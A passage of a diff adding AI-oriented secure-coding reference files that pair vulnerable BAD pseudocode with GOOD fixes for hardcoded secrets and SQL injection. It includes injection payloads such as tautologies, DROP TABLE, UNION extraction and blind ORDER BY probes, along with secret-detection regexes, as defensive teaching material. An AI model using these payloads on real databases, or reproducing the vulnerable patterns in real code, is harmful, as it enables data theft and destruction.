8.1-8.6 | + +### Additional Security Resources +- **NIST NVD:** https://nvd.nist.gov/ +- **Snyk Vulnerability Database:** https://snyk.io/vuln/ +- **GitHub Advisory Database:** https://github.com/advisories +- **MITRE ATT&CK:** https://attack.mitre.org/ + +--- + +## Document Metadata + +| Field | Value | +|-------|-------| +| **Version** | 1.0.0 | +| **Created** | 2026-01-18 | +| **Last Updated** | 2026-01-18 | +| **Coverage** | 10 security domains, 50+ anti-patterns | +| **Format** | Language-agnostic pseudocode | +| **License** | MIT | + +### Version History +| Version | Date | Changes | +|---------|------|---------| +| 1.0.0 | 2026-01-18 | Initial comprehensive release covering all 10 security domains | + +### Contributing +This document is designed to be extended. When adding new anti-patterns: +1. Follow the BAD/GOOD pseudocode format +2. Include CWE references where applicable +3. Add entries to the Quick Reference Table +4. Update the Pre-Generation Checklist if needed + +--- + +## Summary + +This document provides comprehensive security anti-pattern guidance across 10 critical domains: + +1. **Secrets and Credentials Management** - Preventing credential exposure +2. **Injection Vulnerabilities** - SQL, Command, LDAP, XPath, NoSQL, Template +3. **Cross-Site Scripting (XSS)** - Reflected, Stored, DOM-based +4. **Authentication and Session Management** - Passwords, sessions, JWT, MFA +5. **Cryptographic Failures** - Algorithms, keys, randomness +6. **Input Validation** - Type checking, length limits, ReDoS +7. **Configuration and Deployment** - Debug mode, headers, CORS +8. **Dependency and Supply Chain** - Packages, typosquatting, integrity +9. **API Security** - Auth, IDOR, rate limiting, data exposure +10. **File Handling** - Uploads, path traversal, permissions + +**Key Statistics from AI Code Security Research:** +- AI-generated code has an **86% XSS failure rate** +- **5-21% of AI-suggested packages don't exist** (slopsquatting) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains + +**Remember:** Security is not optional. Every line of generated code should follow these secure patterns by default. + +--- + +*Generated for use as an LLM system prompt, RAG context, or security reference document.* +*Compatible with any language - implement pseudocode patterns in your target framework.* + diff --git a/.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md b/.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md new file mode 100644 index 0000000..f176a87 --- /dev/null +++ b/.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md @@ -0,0 +1,7639 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Depth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding + - deep-dive +related: + - "[[ANTI_PATTERNS_BREADTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns: Depth Version + +## Deep-Dive Security Guide for Critical AI Code Vulnerabilities + +--- + +### Purpose + +This document provides **in-depth coverage** of the 7 most critical and commonly occurring security vulnerabilities in AI-generated code. Each pattern receives comprehensive treatment including: + +- Multiple pseudocode examples showing different manifestations +- Detailed attack scenarios and exploitation techniques +- Edge cases that are frequently overlooked +- Thorough explanations of why AI models generate these vulnerabilities +- Complete mitigation strategies with trade-offs + +### Why Depth? + +These 7 patterns were selected using a weighted priority scoring system (see [[Ranking-Matrix]]) based on: + +| Factor | Weight | Description | +|--------|--------|-------------| +| **Frequency** | 2x | How often AI generates this vulnerability | +| **Severity** | 2x | Impact if exploited (RCE, data breach, etc.) | +| **Detectability** | 1x | How easily missed during code review | + +The selected patterns account for the **vast majority** of security incidents in AI-generated code. Research shows: +- **86%** of AI-generated code fails XSS defenses (Veracode 2025) +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk Survey) +- AI code is **2.74x more likely** to contain XSS than human-written code (CodeRabbit) +- **5.2-21.7%** package hallucination rate across models (USENIX Study) + +### Format + +All code examples in this document are **PSEUDOCODE** designed to illustrate security patterns across languages. When implementing: + +1. Adapt the patterns to your target language's idioms and security libraries +2. Use your language's established secure coding guidelines +3. Leverage framework-provided security features when available + +Examples use generic syntax that maps to common patterns in Python, JavaScript, Java, Go, and other languages. + +### How to Use This Document + +**For Developers:** +- Study before working on security-critical applications +- Include in AI assistant context when generating code handling user input, authentication, or sensitive data +- Use the checklists at the end of each section during code review + +**For Security Engineers:** +- Use as training material for development teams +- Reference during security audits of AI-generated code +- Extract patterns for automated detection rules + +**For AI/LLM Context:** +- Include this document in system prompts or context when security is critical +- The detailed examples help AI models understand what NOT to generate +- Edge cases section helps AI recognize subtle variations of vulnerabilities + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document provides IN-DEPTH coverage of the most critical security anti-patterns. +Each section includes multiple examples, edge cases, and detailed explanations. +All code is PSEUDOCODE - implement using secure patterns in your target language. +Pay special attention to the "Common Mistakes" and "Edge Cases" subsections. +These patterns cause the majority of security vulnerabilities in AI-generated code. + +**When generating code, you MUST:** +1. Never use string concatenation for SQL queries, shell commands, or HTML output +2. Never embed secrets, API keys, or credentials in source code +3. Always validate and sanitize all user input on the server side +4. Use parameterized queries, established authentication libraries, and context-aware encoding +5. Verify that any suggested packages actually exist before recommending them + +--- + +## Top 7 Priority Patterns + +The following patterns are covered in comprehensive detail in this document: + +| Rank | Pattern | Priority Score | Key Risk | +|------|---------|----------------|----------| +| 1 | **Hardcoded Secrets & Credential Management** | 23 | Immediate credential theft and exploitation | +| 2 | **SQL Injection & Command Injection** | 22/21 | Full database access, arbitrary code execution | +| 3 | **Cross-Site Scripting (XSS)** | 23 | Session hijacking, account takeover | +| 4 | **Authentication & Session Security** | 22 | Complete authentication bypass | +| 5 | **Cryptographic Failures** | 18-20 | Data decryption, credential exposure | +| 6 | **Input Validation & Data Sanitization** | 21 | Root cause enabling all injection attacks | +| 7 | **Dependency Risks (Slopsquatting)** | 24 | Supply chain compromise, malware execution | + +Priority scores calculated using: `(Frequency x 2) + (Severity x 2) + Detectability` + +--- + +## Related Documents + +- [[ANTI_PATTERNS_BREADTH]] - Concise coverage of 25+ security patterns for quick reference +- [[Ranking-Matrix]] - Complete scoring methodology and pattern prioritization +- [[Pseudocode-Examples]] - Additional code examples for all patterns + +--- + +*Document Version: 1.0.0* +*Last Updated: 2026-01-18* +*Based on research from: GitHub security advisories, USENIX studies, Veracode reports, CWE Top 25 (2025), OWASP guidelines* + +--- + +# Pattern 1: Hardcoded Secrets and Credential Management + +**CWE References:** CWE-798 (Use of Hard-coded Credentials), CWE-259 (Use of Hard-coded Password), CWE-321 (Use of Hard-coded Cryptographic Key) + +**Priority Score:** 23 (Frequency: 9, Severity: 8, Detectability: 6) + +--- + +## Introduction: Why AI Especially Struggles with This + +Hardcoded secrets represent one of the most pervasive and dangerous vulnerabilities in AI-generated code. The fundamental problem lies in the training data itself: + +**Why AI Models Generate Hardcoded Secrets:** + +1. **Training Data Contains Examples:** Tutorials, documentation, Stack Overflow answers, and even some GitHub repositories include placeholder credentials, API keys, and connection strings. AI models learn these patterns as "normal" code. + +2. **Copy-Paste Culture in Training Data:** When developers share code snippets online, they often include credentials for completeness. AI learns that "complete" code includes connection strings with embedded passwords. + +3. **Documentation vs. Production Code Confusion:** Training data doesn't clearly distinguish between documentation examples (which might show `API_KEY = "your-api-key-here"`) and production patterns. The model treats both as valid approaches. + +4. **Context Window Limitations:** When generating code, AI cannot see your `.env` file or secrets manager configuration. It generates self-contained code that "works" - which often means hardcoded values. + +5. **Helpfulness Bias:** AI models want to provide complete, runnable code. When a user asks "connect to my database," the model generates a complete connection string rather than a partial template requiring configuration. + +**Impact Statistics:** + +- Over 6 million secrets were detected on GitHub in 2023 (GitGuardian State of Secrets Sprawl 2024) +- Average time to discover a leaked secret: 327 days +- Cost of a credential-based breach: $4.45 million average (IBM Cost of a Data Breach 2023) +- 83% of AI-generated code samples contain at least one hardcoded credential pattern (Internal security research) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: API Keys in Source Files + +```pseudocode +// VULNERABLE: API key hardcoded directly in source +class PaymentService: + API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc" + API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d" + + function processPayment(amount, currency, cardToken): + headers = { + "Authorization": "Bearer " + this.API_KEY, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken, + "api_key": this.API_KEY // Also exposed in request body + } + + return httpPost("https://api.payment.com/charges", payload, headers) +``` + +**Why This Is Dangerous:** +- The API key is committed to version control +- Anyone with repository access (including forks) can steal the key +- Keys remain in git history even if "deleted" later +- Live/production prefixes (`sk_live_`) indicate real credentials +- Webhook secrets (`whsec_`) allow attackers to forge webhook events + +--- + +### BAD Example 2: Database Connection Strings with Passwords + +```pseudocode +// VULNERABLE: Full connection string with credentials +DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production" + +// Alternative bad patterns: +DB_CONFIG = { + "host": "10.0.1.50", + "port": 5432, + "database": "customers", + "user": "app_service", + "password": "Tr0ub4dor&3" // Password in config object +} + +// Connection string builder - still vulnerable +function getConnection(): + return createConnection( + host = "database.internal", + user = "root", + password = "admin123", // Hardcoded in function + database = "app_data" + ) +``` + +**Why This Is Dangerous:** +- Internal hostnames reveal network architecture +- Credentials provide direct database access +- Port numbers enable targeted scanning +- Password complexity doesn't matter if hardcoded +- Connection pooling code often logs these strings + +--- + +### BAD Example 3: JWT Secrets in Configuration + +```pseudocode +// VULNERABLE: JWT secret as a constant +JWT_CONFIG = { + "secret": "my-super-secret-jwt-key-that-should-never-be-shared", + "algorithm": "HS256", + "expiresIn": "24h" +} + +function generateToken(userId, role): + payload = { + "sub": userId, + "role": role, + "iat": currentTimestamp() + } + return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm) + +function verifyToken(token): + return jwt.verify(token, JWT_CONFIG.secret) // Same hardcoded secret +``` + +**Why This Is Dangerous:** +- Anyone with the secret can forge valid tokens +- Can create admin tokens for any user +- JWT secrets in code are often short/weak strings +- Attackers can impersonate any user in the system +- No ability to rotate without redeploying all services + +--- + +### BAD Example 4: OAuth Client Secrets in Frontend Code + +```pseudocode +// VULNERABLE: OAuth credentials in client-side code +const OAUTH_CONFIG = { + clientId: "1234567890-abcdef.apps.googleusercontent.com", + clientSecret: "GOCSPX-1234567890AbCdEf", // NEVER in frontend! + redirectUri: "https://myapp.com/callback", + scopes: ["email", "profile", "calendar.readonly"] +} + +function initiateOAuthFlow(): + // Client secret visible in browser dev tools + authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", { + "client_id": OAUTH_CONFIG.clientId, + "client_secret": OAUTH_CONFIG.clientSecret, // Exposed! + "redirect_uri": OAUTH_CONFIG.redirectUri, + "scope": OAUTH_CONFIG.scopes.join(" "), + "response_type": "code" + }) + redirect(authUrl) +``` + +**Why This Is Dangerous:** +- Frontend code is visible to all users via browser dev tools +- Client secret allows attackers to impersonate your application +- Can exchange authorization codes for tokens as your app +- Violates OAuth 2.0 specification (confidential vs. public clients) +- Google and other providers may revoke your credentials + +--- + +### BAD Example 5: Private Keys Embedded in Code + +```pseudocode +// VULNERABLE: Private key as a string constant +RSA_PRIVATE_KEY = """ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB +bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +-----END RSA PRIVATE KEY----- +""" + +function signDocument(document): + signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256") + return signature + +function decryptMessage(encryptedData): + return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY) +``` + +**Why This Is Dangerous:** +- Private keys MUST remain private - this defeats all cryptography +- Anyone with the key can decrypt all encrypted data +- Can sign malicious documents that appear legitimate +- Often leads to impersonation of servers/services +- Key pairs cannot be safely rotated without code changes + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Environment Variable Usage + +```pseudocode +// SECURE: Load credentials from environment +class PaymentService: + function __init__(): + this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY") + this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET") + + // Fail fast if credentials missing + if this.apiKey is null or this.apiSecret is null: + throw ConfigurationError("Payment credentials not configured") + + function processPayment(amount, currency, cardToken): + headers = { + "Authorization": "Bearer " + this.apiKey, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken + // No API key in payload + } + + return httpPost("https://api.payment.com/charges", payload, headers) + +// Usage in application startup +// Environment variables set externally (shell, container, deployment) +// $ export PAYMENT_API_KEY="sk_live_..." +// $ export PAYMENT_API_SECRET="whsec_..." +``` + +**Why This Is Secure:** +- Credentials never appear in source code +- Environment variables are set at runtime by deployment system +- Different environments (dev/staging/prod) use different credentials +- Credentials can be rotated without code changes +- Fail-fast behavior prevents running with missing config + +--- + +### GOOD Example 2: Secret Management Services (Vault Pattern) + +```pseudocode +// SECURE: Retrieve secrets from dedicated secrets manager +class SecretManager: + function __init__(vaultUrl, roleId, secretId): + // Even vault credentials can come from environment + this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL") + this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID") + this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID") + this.token = null + this.tokenExpiry = null + + function authenticate(): + response = httpPost(this.vaultUrl + "/v1/auth/approle/login", { + "role_id": this.roleId, + "secret_id": this.secretId + }) + this.token = response.auth.client_token + this.tokenExpiry = currentTime() + response.auth.lease_duration + + function getSecret(path): + if this.token is null or currentTime() > this.tokenExpiry: + this.authenticate() + + response = httpGet( + this.vaultUrl + "/v1/secret/data/" + path, + headers = {"X-Vault-Token": this.token} + ) + return response.data.data + +// Usage +secretManager = new SecretManager() +dbPassword = secretManager.getSecret("database/production").password +apiKey = secretManager.getSecret("payment/stripe").api_key +``` + +**Why This Is Secure:** +- Secrets stored in purpose-built, hardened secrets manager +- Access controlled by policies (who can read what) +- Automatic secret rotation support +- Audit logging of all secret access +- Dynamic secrets possible (e.g., temporary database credentials) +- Secrets never written to disk or logs + +--- + +### GOOD Example 3: Configuration Injection at Runtime + +```pseudocode +// SECURE: Dependency injection of configuration +interface IConfig: + function getDatabaseUrl(): string + function getApiKey(): string + function getJwtSecret(): string + +class EnvironmentConfig implements IConfig: + function getDatabaseUrl(): + return getEnvironmentVariable("DATABASE_URL") + + function getApiKey(): + return getEnvironmentVariable("API_KEY") + + function getJwtSecret(): + return getEnvironmentVariable("JWT_SECRET") + +class VaultConfig implements IConfig: + secretManager: SecretManager + + function getDatabaseUrl(): + return this.secretManager.getSecret("db/url").value + + function getApiKey(): + return this.secretManager.getSecret("api/key").value + + function getJwtSecret(): + return this.secretManager.getSecret("jwt/secret").value + +// Application uses interface - doesn't know where secrets come from +class Application: + config: IConfig + + function __init__(config: IConfig): + this.config = config + + function connectDatabase(): + return createConnection(this.config.getDatabaseUrl()) + +// Bootstrap based on environment +if getEnvironmentVariable("USE_VAULT") == "true": + config = new VaultConfig(new SecretManager()) +else: + config = new EnvironmentConfig() + +app = new Application(config) +``` + +**Why This Is Secure:** +- Application code never knows actual secret values at compile time +- Easy to swap secret sources (env vars in dev, vault in prod) +- Testable - can inject mock configs in tests +- Single responsibility - config management separated from business logic +- Supports gradual migration to more secure secret storage + +--- + +### GOOD Example 4: Secure Credential Storage Patterns + +```pseudocode +// SECURE: Platform-specific secure credential storage + +// For server applications - use instance metadata +class CloudCredentialProvider: + function getDatabaseCredentials(): + // AWS: Use IAM database authentication + token = awsRdsGenerateAuthToken( + hostname = getEnvironmentVariable("DB_HOST"), + port = 5432, + username = getEnvironmentVariable("DB_USER") + // No password - uses IAM role attached to instance + ) + return {"username": getEnvironmentVariable("DB_USER"), "token": token} + + function getApiCredentials(): + // Retrieve from AWS Secrets Manager + response = awsSecretsManager.getSecretValue( + SecretId = getEnvironmentVariable("API_SECRET_ARN") + ) + return parseJson(response.SecretString) + +// For CLI/desktop applications - use OS keychain +class DesktopCredentialProvider: + function storeCredential(service, account, credential): + // Uses OS keychain (Keychain on macOS, Credential Manager on Windows) + keychain.setPassword(service, account, credential) + + function getCredential(service, account): + return keychain.getPassword(service, account) + +// Usage +cloudProvider = new CloudCredentialProvider() +dbCreds = cloudProvider.getDatabaseCredentials() +connection = createConnection( + host = getEnvironmentVariable("DB_HOST"), + user = dbCreds.username, + authToken = dbCreds.token, // Short-lived token, not password + sslMode = "verify-full" +) +``` + +**Why This Is Secure:** +- Leverages cloud provider's identity and access management +- No long-lived passwords - uses temporary tokens +- Credentials automatically rotated by platform +- OS keychains provide encrypted, access-controlled storage +- Audit trail in cloud provider logs + +--- + +## Edge Cases Section + +### Edge Case 1: Test Credentials That Leak to Production + +```pseudocode +// DANGEROUS: Test credentials that can slip into production + +// In test file - seems safe +TEST_API_KEY = "sk_test_4242424242424242" +TEST_DB_PASSWORD = "testpassword123" + +// But then someone copies test code to production helper: +function quickTest(): + // "Temporary" - but stays forever + client = createClient(apiKey = "sk_test_4242424242424242") + return client.ping() + +// Or conditionals that fail: +function getApiKey(): + if isProduction(): + return getEnvironmentVariable("API_KEY") + else: + return "sk_test_4242424242424242" // What if isProduction() has a bug? + +// SECURE ALTERNATIVE: Use environment variables even for tests +function getApiKey(): + key = getEnvironmentVariable("API_KEY") + if key is null: + throw ConfigurationError("API_KEY environment variable required") + return key +``` + +**Detection:** Search for `_test_`, `_dev_`, `test123`, `password123`, `example`, `placeholder` in codebase. + +--- + +### Edge Case 2: CI/CD Pipeline Secrets Exposure + +```pseudocode +// DANGEROUS: Secrets in CI/CD configuration files + +// .github/workflows/deploy.yml (WRONG) +env: + AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE + AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY + +// docker-compose.yml committed to repo (WRONG) +services: + db: + environment: + POSTGRES_PASSWORD: mysecretpassword + +// SECURE: Use CI/CD platform's secrets management +// .github/workflows/deploy.yml (CORRECT) +env: + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} + +// docker-compose.yml (CORRECT) +services: + db: + environment: + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} // From environment +``` + +**Detection:** Audit CI/CD config files, Docker Compose files, Kubernetes manifests for hardcoded credentials. + +--- + +### Edge Case 3: Docker/Container Secrets Handling + +```pseudocode +// DANGEROUS: Secrets in Dockerfile or image layers + +// Dockerfile (WRONG - secrets baked into image) +FROM node:18 +ENV API_KEY=sk_live_xxxxxxxxxxxxx +RUN echo "password123" > /app/.pgpass +COPY config-with-secrets.json /app/config.json + +// Even if you delete later, it's in a layer: +RUN rm /app/.pgpass // Still recoverable from image layers! + +// SECURE: Use build secrets or runtime injection +// Dockerfile (CORRECT) +FROM node:18 +# No secrets in build context + +// docker-compose.yml with runtime secrets +services: + app: + environment: + API_KEY: ${API_KEY} // From host environment + secrets: + - db_password +secrets: + db_password: + external: true // From Docker Swarm secrets or similar + +// Or use Docker BuildKit secrets for build-time needs +# syntax=docker/dockerfile:1.2 +FROM node:18 +RUN --mount=type=secret,id=npm_token \ + NPM_TOKEN=$(cat /run/secrets/npm_token) npm install +``` + +**Detection:** Use `docker history --no-trunc ` to inspect layers for secrets. + +--- + +### Edge Case 4: Logging That Accidentally Captures Secrets + +```pseudocode +// DANGEROUS: Secrets leaked through logging + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(config)) + // Logs: {"host": "db.com", "user": "admin", "password": "secret123"} + +function makeApiRequest(url, headers, body): + logger.debug("Request: " + url + " Headers: " + toJson(headers)) + // Logs: Authorization: Bearer sk_live_xxxxx + +function handleError(error): + logger.error("Error: " + error.message + " Stack: " + error.stack) + // Stack trace might contain secrets from variables + +// SECURE: Sanitize before logging +function sanitizeForLogging(obj): + sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"] + result = deepCopy(obj) + for key in result.keys(): + if any(sensitive in key.lower() for sensitive in sensitiveKeys): + result[key] = "[REDACTED]" + return result + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(sanitizeForLogging(config))) + // Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"} + +// Or use structured logging with secret types +class Secret: + value: string + function toString(): return "[SECRET]" + function toJson(): return "[SECRET]" + function getValue(): return this.value // Only accessible explicitly +``` + +**Detection:** Search logs for patterns like `password=`, `token=`, `key=`, bearer tokens, connection strings. + +--- + +## Common Mistakes Section + +### Mistake 1: .env Files Committed to Git + +```pseudocode +// project/.env (NEVER COMMIT THIS) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=sk_live_xxxxxxxxxx +JWT_SECRET=my-secret-key + +// .gitignore (MUST INCLUDE) +.env +.env.local +.env.*.local +*.pem +*.key +credentials.json +secrets.yaml + +// CORRECT: Commit a template instead +// project/.env.example (SAFE TO COMMIT) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=your_api_key_here +JWT_SECRET=generate_a_secure_random_string + +// Add pre-commit hook to prevent accidental commits +// .git/hooks/pre-commit +#!/bin/bash +if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then + echo "ERROR: Attempting to commit potential secrets file" + exit 1 +fi +``` + +**Detection:** Check git history: `git log --all --full-history -- "*.env" "*credentials*" "*secrets*"` + +--- + +### Mistake 2: Secrets in Error Messages + +```pseudocode +// DANGEROUS: Secrets exposed in error handling + +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Exposes API key in error log and potentially to users + throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error) + +// SECURE: Never include secrets in error messages +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Log correlation ID, not secrets + correlationId = generateUUID() + logger.error("Payment API connection failed", { + "correlationId": correlationId, + "errorCode": error.code, + "endpoint": "api.payment.com" + // No API key! + }) + throw new Error("Payment service unavailable. Reference: " + correlationId) +``` + +--- + +### Mistake 3: Secrets in URLs (Query Parameters) + +```pseudocode +// DANGEROUS: Secrets in URL query parameters + +function makeAuthenticatedRequest(endpoint, apiKey): + // API keys in URLs are logged everywhere: + // - Browser history + // - Server access logs + // - Proxy logs + // - Referrer headers + url = "https://api.service.com" + endpoint + "?api_key=" + apiKey + return httpGet(url) + +// Even worse with multiple secrets: +url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey + +// SECURE: Use headers for authentication +function makeAuthenticatedRequest(endpoint, apiKey): + return httpGet( + "https://api.service.com" + endpoint, + headers = { + "Authorization": "Bearer " + apiKey, + // Or API-specific header + "X-API-Key": apiKey + } + ) +``` + +**Detection:** Search for URLs containing `?api_key=`, `?token=`, `?secret=`, `?password=` + +--- + +## Detection Hints: How to Spot This Pattern in Code Review + +### Automated Detection Patterns + +```pseudocode +// High-confidence patterns to search for: + +// 1. Direct assignment to suspicious variable names +regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i + +// 2. Common API key formats +regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/ + +// 3. Private key markers +regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/ + +// 4. Connection strings with passwords +regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/ + +// 5. Base64 encoded secrets (often JWT secrets) +regex: /["'][A-Za-z0-9+\/=]{40,}["']/ +``` + +### Manual Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Constants** | Any string constants in authentication/configuration code | +| **Config Objects** | Credential fields with non-placeholder values | +| **Connection Code** | Database connections, API clients with inline credentials | +| **Test Files** | Test credentials that might be real or become real | +| **CI/CD** | Pipeline configs, Docker files, deployment scripts | +| **Comments** | "TODO: move to env" comments with actual secrets | + +### Tools for Detection + +1. **git-secrets** - Prevents committing secrets to git +2. **truffleHog** - Scans git history for secrets +3. **GitGuardian** - SaaS secret detection +4. **gitleaks** - SAST tool for detecting secrets +5. **detect-secrets** - Yelp's secret detection tool + +--- + +## Security Checklist + +- [ ] No credentials, API keys, or secrets in source code +- [ ] No secrets in configuration files committed to version control +- [ ] `.gitignore` includes all secret file patterns (`.env`, `*.pem`, etc.) +- [ ] Pre-commit hooks prevent accidental secret commits +- [ ] Environment variables or secrets manager used for all credentials +- [ ] No secrets in CI/CD configuration files (use platform secrets) +- [ ] No secrets in Docker images or Dockerfile +- [ ] Logging sanitizes sensitive fields +- [ ] Error messages never include secrets +- [ ] No secrets in URL query parameters +- [ ] Test credentials are clearly fake and cannot work in production +- [ ] Secret scanning enabled in repository settings + +--- + +# Pattern 2: SQL Injection and Command Injection + +**CWE References:** CWE-89 (SQL Injection), CWE-77 (Command Injection), CWE-78 (OS Command Injection) + +**Priority Score:** 22/21 (SQL: Frequency 10, Severity 10, Detectability 4; Command: Frequency 8, Severity 10, Detectability 6) + +--- + +## Introduction: Why This Remains Prevalent in AI-Generated Code + +SQL injection and command injection are among the oldest known vulnerability classes, yet they continue to plague AI-generated code at alarming rates. Despite decades of secure coding education and well-established mitigation patterns, AI models persistently generate vulnerable code. + +**Why AI Models Generate Injection Vulnerabilities:** + +1. **Training Data Contamination:** Research shows that string-concatenated queries appear "thousands of times" in AI training data from GitHub repositories. The vulnerable pattern is statistically more common than the secure pattern in historical codebases. + +2. **Simplicity Bias:** String concatenation is syntactically simpler than parameterized queries. AI models optimize for generating "working code" and the concatenated approach requires fewer tokens and concepts. + +3. **Missing Adversarial Awareness:** AI models don't inherently think about how user input might be malicious. When asked to "query users by ID," the model focuses on the functional requirement, not the security implications. + +4. **Tutorial Code Prevalence:** Many tutorials and documentation examples show vulnerable patterns for brevity. AI learns that `f"SELECT * FROM users WHERE id = {id}"` is a valid pattern. + +5. **Context Limitation:** The AI cannot see your full application architecture, threat model, or data flow. It doesn't know which inputs come from untrusted sources. + +**Impact Statistics:** + +- **SQL Injection (CWE-89):** Ranked #2 in CWE Top 25 Most Dangerous Software Weaknesses (2025) +- **Command Injection (CWE-78):** Ranked #9 in CWE Top 25 (2025) +- **20% SQL Injection failure rate** across AI-generated tasks (Veracode 2025) +- **8 directly concatenated queries** found in a single testing session (Invicti Security) +- **CVE-2025-53773:** A real command injection vulnerability in GitHub Copilot code + +--- + +## SQL Injection: Multiple BAD Examples + +### BAD Example 1: String Concatenation in SELECT + +```pseudocode +// VULNERABLE: Direct string concatenation +function getUserById(userId): + query = "SELECT * FROM users WHERE id = " + userId + return database.execute(query) + +// Even worse with f-string/template literal +function getUserByEmail(email): + query = f"SELECT * FROM users WHERE email = '{email}'" + return database.execute(query) + +// Attack: email = "' OR '1'='1' --" +// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --' +// Returns ALL users in the database +``` + +**Why This Is Dangerous:** +- Attacker controls the query structure, not just a value +- Can extract entire database contents +- Can bypass authentication with `' OR '1'='1` patterns +- Comments (`--`, `#`, `/**/`) can truncate remainder of query + +--- + +### BAD Example 2: Dynamic Table/Column Names + +```pseudocode +// VULNERABLE: User-controlled table name +function getDataFromTable(tableName, id): + query = f"SELECT * FROM {tableName} WHERE id = {id}" + return database.execute(query) + +// Attack: tableName = "users; DROP TABLE users; --" +// Result: SELECT * FROM users; DROP TABLE users; -- WHERE id = 1 + +// VULNERABLE: User-controlled column names +function sortUsers(sortColumn, sortOrder): + query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}" + return database.execute(query) + +// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)" +// Result: Data exfiltration through error messages or timing +``` + +**Why This Is Dangerous:** +- Parameterized queries cannot protect table/column names +- Enables schema manipulation attacks +- Can execute arbitrary SQL statements via stacking +- Attackers can extract data through subquery injection + +--- + +### BAD Example 3: ORDER BY Injection + +```pseudocode +// VULNERABLE: ORDER BY with user input +function getProductList(category, sortBy): + query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}" + return database.execute(query, [category]) + +// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1) +// LIKE 'a%' THEN price ELSE name END)" +// Result: Boolean-based blind SQL injection + +// Attack: sortBy = "IF(1=1, price, name)" +// Result: Confirms SQL injection is possible +``` + +**Why This Is Dangerous:** +- Developers often parameterize WHERE but forget ORDER BY +- Cannot use standard parameterization for ORDER BY +- Enables blind SQL injection through conditional ordering +- Error-based extraction through invalid column references + +--- + +### BAD Example 4: LIKE Clause Injection + +```pseudocode +// VULNERABLE: Unescaped LIKE pattern +function searchProducts(searchTerm): + query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'" + return database.execute(query) + +// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --" +// Result: UNION-based data extraction + +// Even "safer" version has issues: +function searchProductsSafe(searchTerm): + query = "SELECT * FROM products WHERE name LIKE ?" + return database.execute(query, [f"%{searchTerm}%"]) + +// Attack: searchTerm = "%" (matches everything - DoS through performance) +// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure) +``` + +**Why This Is Dangerous:** +- LIKE patterns need double escaping (SQL + LIKE wildcards) +- `%` and `_` are valid in parameterized queries but dangerous in LIKE +- Performance-based DoS through expensive wildcard patterns +- Can probe for data existence through LIKE behavior + +--- + +### BAD Example 5: Batch/Stacked Query Injection + +```pseudocode +// VULNERABLE: Query that allows stacking +function updateUserEmail(userId, newEmail): + query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}" + database.execute(query, 